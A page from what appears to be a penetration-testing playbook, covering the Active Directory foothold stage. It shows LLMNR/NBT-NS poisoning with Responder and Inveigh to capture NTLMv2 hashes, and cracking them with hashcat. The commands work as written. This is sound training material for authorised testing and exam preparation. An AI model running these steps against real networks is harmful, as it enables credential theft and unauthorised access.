🏰
Pentesting Playbook
  • Pentesting Playbook
    • 🍰About
    • πŸ–₯️The Process
      • πŸ”ŽReconnaissance
        • πŸ”­Passive Reconnaissance
        • πŸ‘£Footprinting
        • πŸ•΅οΈActive Reconnaissance
        • πŸ€–Automated Reconnaissance
      • πŸ›Vulnerability Scanning & Testing
        • πŸ•ΈοΈWeb Hacking
      • πŸ’£Exploitation
        • 🏠Local File Inclusion (LFI)
        • 🐚Shells
        • πŸ’‰SQL Injection (SQLi)
          • πŸ—„οΈDatabases
          • 🐬MySQL
          • πŸ—ƒοΈDatabase Enumeration
          • πŸ“–Reading & Writing Files
          • πŸ—ΊοΈSQLMap
            • Database Enumeration
            • OS Exploitation
            • Bypassing Protection
        • βš”οΈCross Site Scripting (XSS)
      • πŸ”“Authentication
        • 🐧Linux Authentication
        • πŸͺŸWindows Authentication
        • πŸ”‘Brute Forcing Logins
        • πŸ”§Cracking Tools
      • ⬆️Privilege Escalation
        • 🐧Linux Escalation
        • πŸͺŸWindows Escalation
    • β™₯️Useful Extras
    • β˜‘οΈEngagement Checklist
  • Main Topics
    • πŸ–₯️Networking
    • βš”οΈAttacking Common Services
      • 🐬MySQL
      • ⚫MSSQL
      • πŸ–₯️RDP
      • 🦁SMB
      • πŸ—ƒοΈFTP
      • 🌐DNS
      • βœ‰οΈEmail
    • πŸ“Active Directory
      • πŸ”Initial Enumeration
      • 🦢Getting a Foothold
      • 🧺Password Hunting and Gathering
      • πŸ’¦Password Spraying
      • πŸ”Enumerating Security Controls
      • πŸ”‘Credentialed Enumeration with Linux
      • πŸ”‘Credentialed Enumeration with Windows
      • 🚜Living Off the Land
      • πŸ”₯Keberoasting with Linux
      • πŸ”₯Keberoasting with Windows
      • πŸ›‚Access Control List (ACL)
      • πŸ—οΈPrivileged Access
      • πŸ”ͺBleeding Edge Vulnerabilities
      • βš™οΈMisconfigurations
      • 🀝Domain Trusts
        • πŸͺŸAttacking Domain Trusts From Windows
        • 🐧Attacking Domain Trusts From Linux
        • 🌲Cross-Forest Trust Abuse From Windows
        • 🌳Cross-Forest Trust Abuse From Linux
    • ↗️Pivoting, Port Forwarding and Tunnelling
    • πŸ› οΈReverse Engineering
    • πŸ•΅οΈForensics
    • 🦈Pcap Analysis
    • πŸ—„οΈFile Transfers
    • 🚜Living off The Land
    • πŸ’ŽMetasploit Framework
    • ✍️Documentation & Reporting
  • Other Resources
    • ℹ️Interesting Attacks
  • Exam Prep
    • eCPPTv2 Prep
    • OSCP Prep
  • CTF
    • THM Rooms
      • Mustacchio
      • Plethora THM
      • Break Out The Cage
      • Probe
  • HTB Skill Assessments
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
Powered by GitBook
On this page
  • LLMNR/NBT-NS
  • Using Responder in Linux
  • Cracking a NTLMv2 Hash with Hashcat
  • Using Inveigh in Windows
  • Using Inveigh in Powershell
  • Using Inveight in C#

Was this helpful?

  1. Main Topics
  2. Active Directory

Getting a Foothold

PreviousInitial EnumerationNextPassword Hunting and Gathering

Last updated 10 months ago

Was this helpful?

LLMNR/NBT-NS

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows components that can serve as alternate methods of host identification should DNS fail. When LLMNR/NBT-NS are used for name resolution, this means that any host on the network can reply.

This is where we can use Responder to poison these requests. We can intercept the NetNTLM Challenge by using an MITM (Man-in-the-Middle) Attack by poisoning the response during NetNTLM Authentication, this tricks the client into talking to us instead of the real server they wanted to connect to.

Using Responder in Linux

Responder is extremely powerful and has many different functions available to use.

  • -A Analyze mode, allows us to see NBT-NS, BROWSER and LLMNR requests

  • -wf Start the WPAD rogue proxy server

  • -f Attempts to fingerprint the remote host OS and version

  • -v Increase verbosity

  • -F and -P Force NTLM or Basic authentication

Poisoning authentication challenges using Responder

sudo responder -I tun0 -dwP

Once started we should leave Responder to run for a while to maximize the amount of hashes we can obtain. In this case, we received back an SMBv2 connection and Responder extracted an NTLMv2_SSP Response. A log file will be created in the /usr/share/responder/logs directory this will include any captured hashes.

Cracking a NTLMv2 Hash with Hashcat

hashcat -m 5600 hash.txt password-list.txt --force

With a successfully cracked hash, we can begin to enumerate the domain further.

At this stage, it's best to attempt to crack as many hashes as possible to give us more leverage for later down the line.

Using Inveigh in Windows

It works similarly to Responder but is written in Powershell and C#. It can listen to IPv4/v6 and other protocols such as LLMNR, DNS, mDNS LDAP etc.

Using Inveigh in Powershell

Import-Module .\Inveigh.ps1
(Get-Command Invoke-Inveigh).Parameters

Starting Inveigh

Once we start the program we should see that we immediately start getting LLMNR and mDNS requests

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

Using Inveight in C#

The Poweshell version is no longer updated but the C# version is.

.\Inveigh.exe

Once running we should see the options with a [+] are default and enabled and the options with a [] before they are disabled.

If we hit ESC we will enter an interactive console where we can enter commands.

Useful commands

  • HELP - Show a help screen with commands we can type

  • GET NTLMV2UNIQUE - Shows unique captured hashes

  • GET NTLMV2USERNAMES - See collected username

πŸ“
🦢